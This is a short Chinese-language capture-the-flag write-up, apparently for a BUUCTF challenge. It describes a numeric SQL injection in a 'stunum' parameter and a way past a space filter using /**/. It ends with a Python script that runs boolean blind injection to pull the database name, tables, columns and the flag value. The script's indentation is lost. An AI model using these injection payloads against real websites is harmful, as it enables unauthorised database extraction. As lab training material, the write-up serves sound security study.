1.测试输入发现存在数字型sql注入
1 and 1 报错
尝试了几个字符,确定空格被过滤了
空格用/**/替换
1/**/and/**/1 构造轮子尝试成功,所以这里要用布尔注入
后面的思路就是比较常规的了,先爆破库名,再爆破表、字段
写了个脚本简单破了一下
import requests
import time
url1 = "http://5bd21334-0399-4bb8-93b0-49b562b0a1f0.node5.buuoj.cn:81/?stunum="
data = ""
for i in range(1,400):
for j in range(31,128):
payload1 = 'if(ascii(substr(database(),{},1))={},1,0)'.format(i,j) #库名
payload2 = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)="ctf"),{},1))={},1,0)'.format(i,j)#表名
# if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='ctf'),{},1))>{})".format(i,mid)
payload3 = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)="flag"),{},1))={},1,0)'.format(i,j)#列名
payload4 = 'if(ascii(substr((select(value)from(flag)),{},1))={},1,0)'.format(i,j)#字段值
r = requests.get(url = url1 + payload4 )
if r.status_code == 429:
print("too fast")
time.sleep(1)
if r"Hi admin, your score is: 100" in r.text:
data += chr(j)
print(data)